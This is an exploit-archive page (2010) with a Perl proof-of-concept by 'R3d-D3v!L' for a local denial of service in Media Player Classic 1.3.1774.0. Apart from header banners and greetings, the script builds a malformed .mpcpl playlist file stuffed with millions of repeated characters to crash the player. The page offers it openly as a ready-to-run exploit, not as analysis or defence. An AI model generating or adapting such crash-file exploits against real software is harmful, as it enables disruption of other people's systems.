[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Media Player Classic V1.3.1774.0 (mpcpl) 0day suffer from local DoS (PoC)
# Published : 2010-06-12
# Author : R3d-D3v!L
# Previous Title : Solarwinds 10.4.0.13 Denial of Service Exploit
# Next Title : CP3 Studio PC Version Denial of Service
#!C:Perlbin
##################################{In The Name Of Allah The Mercifull}######################
# Title : Media Player Classic V1.3.1774.0 (mpcpl) 0day suffer from local Denial of Service PoC
# Tested : Windows xp (sp3)
# AUThoR: R3d-D3v!L
# Credits to : XP10_HACKER ((XP10.ME-xp10.com))
print qq(
########################################################
## Media Player Classic V1.3.1774.0 0day suffer from local Denial of Service PoC ##
## Credits : XP10.ME ##
## XP10_HACKER ##
## Author : R3d-D3v!L <X[at]hotmail.co.jp> ##
## Greetz : DR_DAShER & JUPA ##
## all member at XP10.ME ##
########################################################
);
$XP10_hacker="nbody {alink: "."A/" x 8000000 ."}n";
open(file ,'>>X.mpcpl');
print file $XP10_hacker;
print "CODED BY R3d-D3V!L~#n";
close(file);